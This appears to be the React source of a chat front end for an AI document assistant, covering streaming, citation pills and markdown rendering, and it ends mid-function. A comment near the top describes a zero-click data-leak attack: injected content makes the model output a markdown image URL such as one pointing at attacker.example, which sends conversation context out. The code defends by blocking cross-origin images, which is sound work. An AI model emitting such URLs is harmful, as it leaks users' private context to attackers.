// BUILD 2025-10-31 - Added custom ReactMarkdown components for proper markdown rendering
import React, { useState, useRef, useEffect } from 'react';
import ReactMarkdown, { defaultUrlTransform } from 'react-markdown';
import { useAuth } from '@clerk/clerk-react';
import { Link } from 'react-router-dom';
import './ChatInterface.css';
import { AGENT_NAME, AGENT_PROMPT, DATA_ROOM_LABEL } from '../siteConfig';

// --- SwarmSec #159: EchoLeak-class markdown image render-sink defense --------
// Assistant markdown (content, thinking, acknowledgment, streaming) is rendered
// at several call sites below. Without an image override a markdown image becomes
// a live <img> the browser fetches on mount, so a model- or corpus-injected image
// URL (e.g. ![](https://attacker.example/leak?d=<context>)) exfiltrates context to
// attacker infrastructure with zero clicks. Defenses: (1) only render
// same-origin / relative images, showing anything else as inert alt text, and
// (2) a urlTransform that blanks non-same-origin image srcs. Every render goes
// through <SafeMarkdown> so no call site can reintroduce the sink.
function isSameOriginImageUrl(url: string, origin: string = window.location.origin): boolean {
  if (!url?.trim()) return false;
  try {
    return new URL(url, origin).origin === origin;
  } catch {
    return false;
  }
}

function safeUrlTransform(url: string, key: string): string {
  // Image srcs (key === 'src' in react-markdown) must be same-origin or they are
  // blanked; every other URL (e.g. link hrefs) defers to react-markdown's built-in
  // sanitizer so javascript:/vbscript: stay blocked.
  if (key === 'src') {
    return isSameOriginImageUrl(url) ? url : '';
  }
  return defaultUrlTransform(url);
}

// Custom ReactMarkdown components for proper styling
const markdownComponents = {
  h1: ({node, ...props}: any) => <h1 className="text-2xl font-bold mt-4 mb-2" {...props} />,
  h2: ({node, ...props}: any) => <h2 className="text-xl font-bold mt-4 mb-2" {...props} />,
  h3: ({node, ...props}: any) => <h3 className="text-lg font-semibold mt-3 mb-1.5" {...props} />,
  h4: ({node, ...props}: any) => <h4 className="text-base font-semibold mt-2 mb-1" {...props} />,
  p: ({node, ...props}: any) => <p className="mb-1 leading-relaxed" {...props} />,
  ul: ({node, ...props}: any) => <ul className="list-disc pl-6 mb-1.5 space-y-0" {...props} />,
  ol: ({node, ...props}: any) => <ol className="list-decimal pl-6 mb-1.5 space-y-0" {...props} />,
  li: ({node, ...props}: any) => <li className="leading-relaxed" {...props} />,
  strong: ({node, ...props}: any) => <strong className="font-semibold" {...props} />,
  em: ({node, ...props}: any) => <em className="italic" {...props} />,
  code: ({node, inline, ...props}: any) => inline ?
    <code className="bg-gray-100 px-1.5 py-0.5 rounded text-sm font-mono" {...props} /> :
    <code className="block bg-gray-100 p-3 rounded text-sm font-mono overflow-x-auto" {...props} />,
  blockquote: ({node, ...props}: any) => <blockquote className="border-l-4 border-gray-300 pl-4 italic my-3" {...props} />,
  a: ({node, ...props}: any) => <a className="text-blue-600 hover:text-blue-800 underline" {...props} />,
  img: ({node, src, alt, ...props}: any) =>
    typeof src === 'string' && isSameOriginImageUrl(src)
      ? <img src={src} alt={alt ?? ''} className="max-w-full h-auto rounded my-2" {...props} />
      : <span className="text-gray-400 italic">{alt ? `[image blocked: ${alt}]` : '[image blocked]'}</span>,
};

// All assistant markdown renders through this wrapper so the image defenses
// above (components.img + urlTransform) apply at every call site uniformly.
const SafeMarkdown = ({ children }: { children?: string | null }) => (
  <ReactMarkdown components={markdownComponents} urlTransform={safeUrlTransform}>
    {children ?? ''}
  </ReactMarkdown>
);

interface CitationData {
  number: number;
  title: string;
  page?: string;
}

interface Message {
  role: 'user' | 'assistant';
  content: string;
  timestamp: string;
  toolsUsed?: any[];
  thinking?: string; // Reasoning/thinking text
  acknowledgment?: string; // Courtesy acknowledgment
  citations?: { [key: number]: CitationData }; // Citation registry
  metadata?: {
    cancelled?: boolean;
    duration?: number;
    phase?: string;
    toolInProgress?: string | null;
    hadContent?: boolean;
  };
}

interface ChatInterfaceProps {
  onLogout: () => void;
}

interface StreamStatus {
  status: string;
  message: string;
  toolName?: string;
  iteration?: number;
  maxIterations?: number;
}

interface ToolActivity {
  name: string;
  status: 'running' | 'complete';
  timestamp: number;
}

// Extract plain text of the RFP Insert section from message content
const extractRfpInsertText = (content: string): string | null => {
  const marker = '**RFP Insert:**';
  const idx = content.indexOf(marker);
  if (idx === -1) return null;
  let text = content.substring(idx + marker.length).trim();
  // Truncate at the next section boundary (--- or another bold header)
  const boundaryMatch = text.match(/\n---|\n\*\*[A-Z]/);
  if (boundaryMatch?.index !== undefined) {
    text = text.substring(0, boundaryMatch.index);
  }
  // Strip citation markers and markdown formatting
  text = text.replace(/\[\[CITATION:\d+\]\]/g, '');
  text = text.replace(/\*\*(.*?)\*\*/g, '$1');
  text = text.replace(/\*(.*?)\*/g, '$1');
  return text.trim() || null;
};

// Map technical tool names to user-friendly labels
const getToolFriendlyName = (toolName: string): string => {
  const toolNameMap: { [key: string]: string } = {
    'get_document_index': 'Reviewing document index',
    'list_available_documents': 'Listing available documents',
    'search_documents': 'Searching documents',
    'read_document': 'Reading documents',
    'read_spreadsheet': 'Analyzing spreadsheet data'
  };
  return toolNameMap[toolName] || toolName;
};

// Format timestamp to local time (e.g., "10:58 AM")
const formatTimestamp = (isoString: string): string => {
  const date = new Date(isoString);
  return date.toLocaleTimeString(undefined, {
    hour: 'numeric',
    minute: '2-digit',
    hour12: true
  });
};

// Parse citations from text like "[Source: Document Name, Page X]"
// Deduplicates by source+page so same source gets same number
const parseCitations = (text: string): { content: string; citations: { [key: number]: CitationData } } => {
  const citations: { [key: number]: CitationData } = {};
  const sourceToNumber: { [key: string]: number } = {}; // Track seen sources
  let nextNumber = 1;

  // Match patterns like [Source: Document Name] or [Source: Document Name, Page/Slide/Sheet info]
  // Handle filenames with commas by looking for the last comma before Page/Slide/Sheet keywords
  const citationRegex = /\[Source:\s*(.+?)(?:,\s*(?:Page|Slide|Sheet)\s+([^\]]+?))?\s*\]/gi;

  const content = text.replace(citationRegex, (match, title, page) => {
    const trimmedTitle = title.trim();
    const trimmedPage = page ? page.trim() : undefined;

    // Create unique key for this source (title + page)
    const sourceKey = `${trimmedTitle}${trimmedPage ? `-${trimmedPage}` : ''}`;

    // Check if we've seen this source before
    let num: number;
    if (sourceKey in sourceToNumber) {
      // Reuse existing number for this source
      num = sourceToNumber[sourceKey];
    } else {
      // Assign new number and store mapping
      num = nextNumber++;
      sourceToNumber[sourceKey] = num;
      citations[num] = {
        number: num,
        title: trimmedTitle,
        page: trimmedPage
      };
    }

    return `[[CITATION:${num}]]`;
  });

  return { content, citations };
};

// Citation component
interface CitationProps {
  number: number;
  title: string;
  page?: string;
  instanceId: string;
  expandedCitation: string | null;
  setExpandedCitation: (id: string | null) => void;
}

const Citation: React.FC<CitationProps> = ({ number, title, page, instanceId, expandedCitation, setExpandedCitation }) => {
  const isExpanded = expandedCitation === instanceId;

  return (
    <span style={{ display: 'inline-block', position: 'relative', marginLeft: '3px' }}>
      <span
        onClick={() => setExpandedCitation(isExpanded ? null : instanceId)}
        title={title}
        style={{
          display: 'inline-block',
          padding: '2px 7px',
          backgroundColor: isExpanded ? '#0066FF' : '#F0F7FF',
          color: isExpanded ? '#FFF' : '#0066FF',
          borderRadius: '10px',
          fontSize: '12px',
          fontWeight: 600,
          cursor: 'pointer',
          border: '1px solid #0066FF',
          transition: 'all 0.2s'
        }}
        onMouseEnter={(e) => {
          if (!isExpanded) {
            e.currentTarget.style.backgroundColor = '#0066FF';
            e.currentTarget.style.color = '#FFF';
          }
        }}
        onMouseLeave={(e) => {
          if (!isExpanded) {
            e.currentTarget.style.backgroundColor = '#F0F7FF';
            e.currentTarget.style.color = '#0066FF';
          }
        }}
      >
        {number}
      </span>
      {isExpanded && (
        <span style={{
          display: 'block',
          marginTop: '8px',
          marginLeft: '0',
          padding: '12px',
          backgroundColor: '#F9FAFB',
          border: '1px solid #E5E7EB',
          borderRadius: '8px',
          fontSize: '13px',
          color: '#374151',
          lineHeight: '1.5',
          position: 'absolute',
          left: '0',
          top: '100%',
          minWidth: '280px',
          zIndex: 10,
          boxShadow: '0 4px 12px rgba(0, 0, 0, 0.1)'
        }}>
          <div style={{ fontWeight: 600, marginBottom: '4px' }}>{title}</div>
          {page && <div style={{ fontSize: '12px', color: '#6B7280' }}>Page {page}</div>}
        </span>
      )}
    </span>
  );
};

// Render content with citation pills
interface ContentWithCitationsProps {
  content: string;
  citations: { [key: number]: CitationData };
  messageId: string;
  expandedCitation: string | null;
  setExpandedCitation: (id: string | null) => void;
}

// Simple inline markdown parser for basic formatting
const parseInlineMarkdown = (text: string): (string | React.ReactElement)[] => {
  const elements: (string | React.ReactElement)[] = [];
  let key = 0;

  // Parse bold (**text** or __text__)
  const boldRegex = /(\*\*|__)(.*?)\1/g;
  let lastIndex = 0;
  let match;

  const processTextSegment = (segment: string): (string | React.ReactElement)[] => {
    const results: (string | React.ReactElement)[] = [];

    // Parse italic (*text* or _text_) within the segment
    const italicRegex = /(\*|_)(.*?)\1/g;
    let italicLastIndex = 0;
    let italicMatch;

    while ((italicMatch = italicRegex.exec(segment)) !== null) {
      if (italicMatch.index > italicLastIndex) {
        results.push(segment.slice(italicLastIndex, italicMatch.index));
      }
      results.push(<em key={`em-${key++}`}>{italicMatch[2]}</em>);
      italicLastIndex = italicRegex.lastIndex;
    }

    if (italicLastIndex < segment.length) {
      results.push(segment.slice(italicLastIndex));
    }

    return results;
  };

  while ((match = boldRegex.exec(text)) !== null) {
    if (match.index > lastIndex) {
      elements.push(...processTextSegment(text.slice(lastIndex, match.index)));
    }
    elements.push(<strong key={`strong-${key++}`}>{match[2]}</strong>);
    lastIndex = boldRegex.lastIndex;
  }

  if (lastIndex < text.length) {
    elements.push(...processTextSegment(text.slice(lastIndex)));
  }

  return elements;
};

const ContentWithCitations: React.FC<ContentWithCitationsProps> = ({
  content,
  citations,
  messageId,
  expandedCitation,
  setExpandedCitation
}) => {
  const hasCitations = content.includes('[[CITATION:');

  if (!hasCitations) {
    return (
      <div className="prose prose-sm max-w-none">
        <SafeMarkdown>{content}</SafeMarkdown>
      </div>
    );
  }

  // Process line by line to maintain proper structure
  let lines = content.split('\n');

  // Post-process: merge citations that appear on their own line back to the previous line
  const mergedLines: string[] = [];
  for (let i = 0; i < lines.length; i++) {
    const line = lines[i];
    const trimmedLine = line.trim();

    // Check if this line is ONLY a citation (and not part of a bullet list)
    const isCitationOnly = /^\[\[CITATION:\d+\]\]$/.test(trimmedLine);

    if (isCitationOnly && mergedLines.length > 0) {
      // Merge citation into previous line with a space
      mergedLines[mergedLines.length - 1] += ' ' + trimmedLine;
    } else {
      mergedLines.push(line);
    }
  }

  lines = mergedLines;

  // Helper to render a single line's content (with citation parsing)
  const renderLineContent = (line: string, lineIdx: number) => {
    const trimmedLine = line.trim();

    // Strip list prefix if present
    let contentToRender = trimmedLine;
    if (/^[-*+]\s/.test(trimmedLine)) {
      contentToRender = trimmedLine.replace(/^[-*+]\s/, '');
    } else if (/^\d+\.\s/.test(trimmedLine)) {
      contentToRender = trimmedLine.replace(/^\d+\.\s/, '');
    }

    const parts = contentToRender.split(/(\[\[CITATION:\d+\]\])/g);

    return (
      <>
        {parts.map((part, partIdx) => {
          const citationMatch = part.match(/\[\[CITATION:(\d+)\]\]/);

          if (citationMatch) {
            const num = parseInt(citationMatch[1]);
            const citation = citations[num];
            if (citation) {
              return (
                <Citation
                  key={`${messageId}-cite-${num}-${lineIdx}-${partIdx}`}
                  number={num}
                  title={citation.title}
                  page={citation.page}
                  instanceId={`${messageId}-cite-${num}-${lineIdx}-${partIdx}`}
                  expandedCitation={expandedCitation}
                  setExpandedCitation={setExpandedCitation}
                />
              );
            }
            return null;
          }

          // Regular text - parse inline markdown manually
          if (part.trim()) {
            const parsed = parseInlineMarkdown(part);
            return (
              <span key={`text-${lineIdx}-${partIdx}`}>
                {parsed}
              </span>
            );
          }

          return null;
        })}
      </>
    );
  };

  // Group consecutive list items together
  const groupedElements: React.ReactNode[] = [];
  let i = 0;

  while (i < lines.length) {
    const line = lines[i];
    const trimmedLine = line.trim();
    const hasCitationInLine = line.includes('[[CITATION:');

    if (!hasCitationInLine) {
      // No citation - use ReactMarkdown
      groupedElements.push(
        <SafeMarkdown key={`line-${i}`}>{line}</SafeMarkdown>
      );
      i++;
      continue;
    }

    // Check if this is a list item
    const isUnorderedListItem = /^[-*+]\s/.test(trimmedLine);
    const isOrderedListItem = /^\d+\.\s/.test(trimmedLine);

    if (isUnorderedListItem || isOrderedListItem) {
      // Start collecting consecutive list items
      const listItems: React.ReactNode[] = [];
      const listType = isUnorderedListItem ? 'ul' : 'ol';
      const startIdx = i;

      while (i < lines.length) {
        const currentLine = lines[i];
        const currentTrimmed = currentLine.trim();
        const hasCitation = currentLine.includes('[[CITATION:');

        // Check if still a list item of the same type
        const isUL = /^[-*+]\s/.test(currentTrimmed);
        const isOL = /^\d+\.\s/.test(currentTrimmed);
        const currentListType = isUL ? 'ul' : isOL ? 'ol' : null;

        if (!hasCitation || currentListType !== listType) {
          break; // End of consecutive list items
        }

        listItems.push(
          <li key={`li-${i}`} style={{ lineHeight: '1.25' }}>
            {renderLineContent(currentLine, i)}
          </li>
        );
        i++;
      }

      // Render the grouped list with reduced spacing
      if (listType === 'ul') {
        groupedElements.push(
          <ul key={`list-${startIdx}`} className="list-disc pl-6 mb-1.5" style={{ marginTop: '0.25rem' }}>
            {listItems}
          </ul>
        );
      } else {
        groupedElements.push(
          <ol key={`list-${startIdx}`} className="list-decimal pl-6 mb-1.5" style={{ marginTop: '0.25rem' }}>
            {listItems}
          </ol>
        );
      }
    } else {
      // Regular paragraph with citation
      groupedElements.push(
        <div key={`line-${i}`} style={{ marginBottom: '0.25rem' }}>
          {renderLineContent(line, i)}
        </div>
      );
      i++;
    }
  }

  return (
    <div className="prose prose-sm max-w-none">
      {groupedElements}
    </div>
  );
};

// Map backend status to display message (no emojis)
const getStatusDisplay = (streamStatus: StreamStatus | null): { primary: string; secondary: string } | null => {
  if (!streamStatus) return null;

  const { status, message, toolName } = streamStatus;

  // Tool execution statuses - show what tool is running
  if (status === 'tool_executing' && toolName) {
    const toolFriendly = getToolFriendlyName(toolName);
    return {
      primary: toolFriendly,
      secondary: 'Processing data from documents'
    };
  }

  if (status === 'tool_use' && toolName) {
    const toolFriendly = getToolFriendlyName(toolName);
    return {
      primary: toolFriendly,
      secondary: DATA_ROOM_LABEL
    };
  }

  if (status === 'tool_complete' && toolName) {
    const toolFriendly = getToolFriendlyName(toolName);
    return {
      primary: toolFriendly,
      secondary: 'Data retrieved successfully'
    };
  }

  // Generic thinking statuses
  if (status === 'thinking') {
    if (message.includes('Starting')) {
      return {
        primary: 'Starting analysis...',
        secondary: 'Preparing to gather information'
      };
    }
    if (message.includes('Analyzing')) {
      return {
        primary: 'Analyzing results...',
        secondary: 'Processing information'
      };
    }
    return {
      primary: message,
      secondary: 'Processing'
    };
  }

  // Fallback: use message as-is
  return {
    primary: message,
    secondary: 'Working on your request'
  };
};

const ChatInterface: React.FC<ChatInterfaceProps> = ({ onLogout }) => {
  const { getToken } = useAuth(); // Get Clerk auth token

  const [messages, setMessages] = useState<Message[]>([]);
  const [input, setInput] = useState('');
  const [isLoading, setIsLoading] = useState(false);
  const [streamingMessage, setStreamingMessage] = useState('');
  const [acknowledgmentText, setAcknowledgmentText] = useState(''); // Courtesy acknowledgment
  const [thinkingText, setThinkingText] = useState(''); // Intermediate reasoning text
  const [streamStatus, setStreamStatus] = useState<StreamStatus | null>(null);
  const [toolActivity, setToolActivity] = useState<ToolActivity[]>([]);
  const [currentQuestion, setCurrentQuestion] = useState<string>(''); // Track current question for analytics
  const [showWorkingSection, setShowWorkingSection] = useState(true);

  // Rate limit retry state
  const [isWaitingForRetry, setIsWaitingForRetry] = useState(false);
  const [retryCountdown, setRetryCountdown] = useState(0);
  const [queuedMessage, setQueuedMessage] = useState<string | null>(null);

  // Dynamic status visibility control
  const [showDynamicStatus, setShowDynamicStatus] = useState(false);

  // Reasoning collapsed/expanded state tracking
  const [expandedReasoning, setExpandedReasoning] = useState<{[key: number]: boolean}>({});
  const [showStreamingReasoning, setShowStreamingReasoning] = useState(true); // Expanded by default

  // Citation state
  const [expandedCitation, setExpandedCitation] = useState<string | null>(null);

  // RFP Insert copy feedback state
  const [copiedMessageIdx, setCopiedMessageIdx] = useState<number | null>(null);
  const copiedTimeoutRef = useRef<ReturnType<typeof setTimeout> | null>(null);

  // Per-message elapsed time (resets when status message changes)
  const [messageElapsedTime, setMessageElapsedTime] = useState(0);
  const [lastStatusMessage, setLastStatusMessage] = useState<string | null>(null);

  // Idle detection state
  const [lastContentUpdateTime, setLastContentUpdateTime] = useState(0);
  const [loadingElapsedTime, setLoadingElapsedTime] = useState(0);

  const containerRef = useRef<HTMLDivElement>(null); // Scrollable container
  const messagesEndRef = useRef<HTMLDivElement>(null);
  const abortControllerRef = useRef<AbortController | null>(null);
  const retryTimerRef = useRef<number | null>(null);
  const inputRef = useRef<HTMLTextAreaElement>(null);
  const dynamicStatusTimerRef = useRef<number | null>(null);
  const shouldAutoScrollRef = useRef(true); // Tracks if auto-scroll is enabled

  // Auto-scroll detection - detect when user manually scrolls
  useEffect(() => {
    const container = containerRef.current;
    if (!container) return;

    const handleScroll = () => {
      const { scrollTop, scrollHeight, clientHeight } = container;
      const distanceFromBottom = scrollHeight - scrollTop - clientHeight;

      // If user is more than 100px from bottom, disable auto-scroll
      // If user is within 100px of bottom, enable auto-scroll
      shouldAutoScrollRef.current = distanceFromBottom <= 100;
    };

    container.addEventListener('scroll', handleScroll, { passive: true });
    return () => container.removeEventListener('scroll', handleScroll);
  }, []);

  // Auto-scroll to bottom (only if user hasn't scrolled up)
  useEffect(() => {
    if (shouldAutoScrollRef.current && isLoading) {
      const container = containerRef.current;
      if (container) {
        // Direct scrollTop assignment - fast and doesn't trigger scroll events
        container.scrollTop = container.scrollHeight;
      }
    }
  }, [streamingMessage, acknowledgmentText, thinkingText, isLoading]);

  // Auto-focus input after response completes
  useEffect(() => {
    if (!isLoading && !isWaitingForRetry) {
      inputRef.current?.focus();
    }
  }, [isLoading, isWaitingForRetry]);

  // Auto-resize textarea as user types
  const handleInputChange = (e: React.ChangeEvent<HTMLTextAreaElement>) => {
    setInput(e.target.value);

    // Auto-resize
    if (inputRef.current) {
      inputRef.current.style.height = 'auto';
      inputRef.current.style.height = `${Math.min(inputRef.current.scrollHeight, 144)}px`; // Max 6 lines (~144px)
    }
  };

  // Countdown timer effect for rate limit retry
  useEffect(() => {
    if (retryCountdown > 0) {
      const timer = setTimeout(() => {
        setRetryCountdown(retryCountdown - 1);
      }, 1000);
      return () => clearTimeout(timer);
    } else if (retryCountdown === 0 && isWaitingForRetry && queuedMessage) {
      // Countdown finished, retry the message
      setIsWaitingForRetry(false);
      const messageToRetry = queuedMessage;
      setQueuedMessage(null);
      sendMessage(messageToRetry, messages);
    }
  }, [retryCountdown, isWaitingForRetry, queuedMessage, messages]);

  // Track content updates and control dynamic status visibility (10-second idle detection)
  useEffect(() => {
    // Track VISIBLE content only (acknowledgment, streaming message)
    // Note: thinkingText is excluded because reasoning box is collapsed/invisible
    const hasContent = acknowledgmentText || streamingMessage;

    if (hasContent) {
      // Content was updated - hide dynamic status and record timestamp
      setLastContentUpdateTime(Date.now());
      setShowDynamicStatus(false);

      // Clear any existing timer
      if (dynamicStatusTimerRef.current) {
        clearTimeout(dynamicStatusTimerRef.current);
        dynamicStatusTimerRef.current = null;
      }

      // Set up new timer - show dynamic status after 10 seconds of idle
      dynamicStatusTimerRef.current = window.setTimeout(() => {
        const timeSinceLastUpdate = Date.now() - lastContentUpdateTime;
        if (timeSinceLastUpdate >= 10000 && isLoading) {
          setShowDynamicStatus(true);
        }
      }, 10000);

      return () => {
        if (dynamicStatusTimerRef.current) {
          clearTimeout(dynamicStatusTimerRef.current);
        }
      };
    } else if (isLoading) {
      // No content yet but loading - start 10-second timer
      setShowDynamicStatus(false);

      // Clear any existing timer
      if (dynamicStatusTimerRef.current) {
        clearTimeout(dynamicStatusTimerRef.current);
        dynamicStatusTimerRef.current = null;
      }

      // Set up timer - show dynamic status after 10 seconds if still no content
      dynamicStatusTimerRef.current = window.setTimeout(() => {
        if (!acknowledgmentText && !streamingMessage && isLoading) {
          setShowDynamicStatus(true);
        }
      }, 10000);

      return () => {
        if (dynamicStatusTimerRef.current) {
          clearTimeout(dynamicStatusTimerRef.current);
        }
      };
    } else {
      // Not loading and no content - hide dynamic status
      setShowDynamicStatus(false);
    }
  }, [acknowledgmentText, streamingMessage, isLoading, lastContentUpdateTime]);

  // Track elapsed time during loading for cancel button (global timer)
  useEffect(() => {
    if (!isLoading) {
      setLoadingElapsedTime(0);
      return;
    }

    const startTime = Date.now();
    const interval = setInterval(() => {
      const elapsed = Math.floor((Date.now() - startTime) / 1000);
      setLoadingElapsedTime(elapsed);
    }, 1000);

    return () => clearInterval(interval);
  }, [isLoading]);

  // Track per-message elapsed time (resets when status message changes)
  useEffect(() => {
    const currentMessage = streamStatus?.message;

    // Reset timer if message changed or loading stopped
    if (!isLoading || currentMessage !== lastStatusMessage) {
      setMessageElapsedTime(0);
      setLastStatusMessage(currentMessage || null);

      if (!isLoading) {
        return;
      }
    }

    // Start counting for the current message
    const startTime = Date.now();
    const interval = setInterval(() => {
      const elapsed = Math.floor((Date.now() - startTime) / 1000);
      setMessageElapsedTime(elapsed);
    }, 1000);

    return () => clearInterval(interval);
  }, [isLoading, streamStatus?.message, lastStatusMessage]);

  // Helper function to actually send the message (extracted for retry logic)
  const sendMessage = async (userInput: string, conversationHistory: Message[]) => {
    setIsLoading(true);
    setStreamingMessage('');
    setAcknowledgmentText('');
    setThinkingText('');
    setStreamStatus(null);
    setToolActivity([]);
    setShowWorkingSection(true);
    setCurrentQuestion(userInput); // Track question for cancellation analytics

    // Create abort controller for this request
    const abortController = new AbortController();
    abortControllerRef.current = abortController;

    try {
      // Get Clerk session token
      const token = await getToken();

      if (!token) {
        throw new Error('Not authenticated. Please sign in again.');
      }

      // Strip extra fields from messages before sending to API
      // Anthropic API only accepts role and content
      const cleanedHistory = conversationHistory.map(msg => ({
        role: msg.role,
        content: msg.content
      }));

      // Use production backend when testing locally (unless local backend is running)
      const API_URL = (window.location.origin.includes('run.app') || window.location.origin.includes('sectionai.com') || window.location.origin.includes('onrender.com'))
        ? window.location.origin
        : 'http://localhost:3002';

      const response = await fetch(`${API_URL}/api/chat/stream`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Authorization': `Bearer ${token}`
        },
        body: JSON.stringify({
          message: userInput,
          conversationHistory: cleanedHistory
        }),
        signal: abortController.signal
      });

      if (!response.ok) {
        throw new Error('Failed to get response');
      }

      const reader = response.body?.getReader();
      const decoder = new TextDecoder();
      let buffer = '';
      let accumulatedText = '';
      let toolsUsed: any[] = [];
      // Track thinking and acknowledgment locally to avoid state race conditions
      let accumulatedThinking = '';
      let accumulatedAcknowledgment = '';

      if (reader) {
        while (true) {
          const { done, value } = await reader.read();

          if (done) break;

          buffer += decoder.decode(value, { stream: true });
          const lines = buffer.split('\n');
          buffer = lines.pop() || '';

          for (const line of lines) {
            if (line.startsWith('data: ')) {
              const data = JSON.parse(line.slice(6));

              switch (data.type) {
                case 'status':
                  setStreamStatus({
                    status: data.status,
                    message: data.message
                  });
                  break;

                case 'tool_start':
                  setToolActivity(prev => [...prev, {
                    name: data.toolName,
                    status: 'running',
                    timestamp: Date.now()
                  }]);
                  setStreamStatus({
                    status: 'tool_use',
                    message: getToolFriendlyName(data.toolName),
                    toolName: data.toolName,
                    iteration: data.iteration,
                    maxIterations: data.maxIterations
                  });
                  break;

                case 'tool_executing':
                  setStreamStatus({
                    status: 'tool_executing',
                    message: getToolFriendlyName(data.toolName) + '...',
                    toolName: data.toolName
                  });
                  break;

                case 'tool_complete':
                  setToolActivity(prev => prev.map(tool =>
                    tool.name === data.toolName && tool.status === 'running'
                      ? { ...tool, status: 'complete' }
                      : tool
                  ));
                  setStreamStatus({
                    status: 'tool_complete',
                    message: 'Completed: ' + getToolFriendlyName(data.toolName),
                    toolName: data.toolName
                  });
                  break;

                case 'clear_response':
                  // Clear the streaming message - backend will send thinking via thinking_delta
                  accumulatedText = '';
                  setStreamingMessage('');
                  break;

                case 'acknowledgment':
                  accumulatedAcknowledgment = data.text;
                  setAcknowledgmentText(data.text);
                  break;

                case 'thinking_delta':
                  accumulatedThinking += data.text;
                  setThinkingText(accumulatedThinking);
                  break;

                case 'final_thinking':
                  // Final thinking from backend - only set if we don't already have thinking
                  // If we already have thinking text from deltas, keep it
                  // Otherwise use the final_thinking sent by backend
                  if (accumulatedThinking.length === 0) {
                    accumulatedThinking = data.text;
                  }
                  setThinkingText(accumulatedThinking);
                  break;

                case 'text_delta':
                  accumulatedText += data.text;
                  setStreamingMessage(accumulatedText);
                  break;

                case 'complete':
                  toolsUsed = data.toolsUsed || [];
                  // Use complete message ONLY if we don't have an acknowledgment already
                  // If acknowledgment exists, backend prepended it to message (causing duplication)
                  if (data.message && !accumulatedAcknowledgment) {
                    accumulatedText = data.message;
                    setStreamingMessage(data.message);
                  }
                  setStreamStatus(null);
                  break;

                case 'rate_limit_error':
                  // Handle rate limit error with automatic retry
                  const retryAfterSeconds = data.retryAfter || 60;

                  // Queue the current message for retry
                  setQueuedMessage(userInput);
                  setRetryCountdown(retryAfterSeconds);
                  setIsWaitingForRetry(true);

                  // Add informative message about auto-retry
                  const rateLimitMessage: Message = {
                    role: 'assistant',
                    content: `⏱️ **Rate Limit Reached**\n\nI've hit my rate limit but don't worry! Your message has been queued and I'll automatically retry in **${retryAfterSeconds} seconds**.\n\nYou don't need to do anything - just sit back and I'll process your request as soon as the limit resets.\n\n_Countdown: ${retryAfterSeconds}s remaining_`,
                    timestamp: new Date().toISOString()
                  };
                  setMessages(prev => [...prev, rateLimitMessage]);
                  setStreamingMessage('');
                  setStreamStatus(null);
                  setIsLoading(false);
                  return; // Exit early, don't throw error

                case 'error':
                  throw new Error(data.error);
              }
            }
          }
        }
      }

      // Parse citations from content
      const { content: parsedContent, citations } = parseCitations(accumulatedText || 'No response received');

      const assistantMessage: Message = {
        role: 'assistant',
        content: parsedContent,
        timestamp: new Date().toISOString(),
        toolsUsed: toolsUsed,
        // Use local variables to avoid state race conditions
        thinking: accumulatedThinking || undefined,
        acknowledgment: accumulatedAcknowledgment || undefined,
        citations: Object.keys(citations).length > 0 ? citations : undefined
      };

      setMessages(prev => [...prev, assistantMessage]);

      // Clear all streaming state immediately after adding message to history
      setStreamingMessage('');
      setAcknowledgmentText('');
      setThinkingText('');
      setStreamStatus(null);

    } catch (error: any) {
      if (error.name === 'AbortError') {
        console.log('Request aborted');
        return;
      }

      console.error('Error sending message:', error);
      const errorMessage: Message = {
        role: 'assistant',
        content: 'Sorry, I encountered an error processing your request. Please try again.',
        timestamp: new Date().toISOString()
      };
      setMessages(prev => [...prev, errorMessage]);
      setStreamingMessage('');
      setStreamStatus(null);
    } finally {
      // Don't clear streaming state here - let it persist to show the complete answer structure
      // Will be cleared when next message starts (see setIsLoading(true) at top of function)
      setIsLoading(false);
      abortControllerRef.current = null;
    }
  };

  // Get contextual loading message based on elapsed time
  const getDisplayMessage = (message: string | undefined, elapsed: number): string => {
    // If we have a backend status message, use it with time
    if (message && message !== 'Connecting...') {
      if (elapsed < 10) return message;

      const timeStr = elapsed >= 60
        ? `${Math.floor(elapsed / 60)}m ${elapsed % 60}s`
        : `${elapsed}s`;

      if (elapsed < 60) {
        return `${message} (${timeStr})`;
      }
      return `${message} (${timeStr} - taking longer than usual)`;
    }

    // Connection phase - no backend status yet
    if (!message || message === 'Connecting...') {
      if (elapsed < 10) {
        return 'Connecting...';
      }

      const timeStr = elapsed >= 60
        ? `${Math.floor(elapsed / 60)}m ${elapsed % 60}s`
        : `${elapsed}s`;

      if (elapsed < 30) {
        return `Connecting... (${timeStr})`;
      }
      if (elapsed < 60) {
        return `Connection slow - try refreshing`;
      }
      return `Reload the page or try incognito`;
    }

    // Default fallback
    return message || 'Processing...';
  };

  // Determine when to show cancel button based on phase
  const shouldShowCancel = (): boolean => {
    // Connection phase (no backend status yet) - show cancel at 30s
    if (!streamStatus?.message || streamStatus.message === 'Connecting...') {
      return loadingElapsedTime >= 30;
    }
    // Processing phase (backend responding) - show cancel at 45s
    return loadingElapsedTime >= 45;
  };

  // Cancel request handler
  const handleCancelRequest = async () => {
    if (abortControllerRef.current) {
      abortControllerRef.current.abort();
    }

    // Preserve partial content if any was received
    const hadContent = streamingMessage || acknowledgmentText;
    const contentToShow = hadContent
      ? `${streamingMessage}\n\n---\nRequest interrupted by user.`
      : 'Request interrupted by user.';

    // Create cancelled message with preserved content and metadata
    const cancelledMessage: Message = {
      role: 'assistant',
      content: contentToShow,
      timestamp: new Date().toISOString(),
      thinking: thinkingText || undefined,
      acknowledgment: acknowledgmentText || undefined,
      metadata: {
        cancelled: true,
        duration: loadingElapsedTime,
        phase: streamStatus?.status || 'unknown',
        toolInProgress: streamStatus?.toolName || null,
        hadContent: !!hadContent
      }
    };

    setMessages(prev => [...prev, cancelledMessage]);

    // Log cancellation to Google Sheets (async, don't wait)
    try {
      const token = await getToken();
      const API_URL = (window.location.origin.includes('run.app') || window.location.origin.includes('sectionai.com') || window.location.origin.includes('onrender.com'))
        ? window.location.origin
        : 'http://localhost:3002';

      fetch(`${API_URL}/api/chat/log-cancellation`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Authorization': `Bearer ${token}`
        },
        body: JSON.stringify({
          question: currentQuestion,
          duration: loadingElapsedTime,
          phase: streamStatus?.status || 'unknown',
          toolInProgress: streamStatus?.toolName || null,
          partialContent: streamingMessage || null
        })
      }).catch(err => console.error('Failed to log cancellation:', err));
    } catch (err) {
      console.error('Failed to log cancellation:', err);
    }

    // Clear streaming state
    setIsLoading(false);
    setStreamingMessage('');
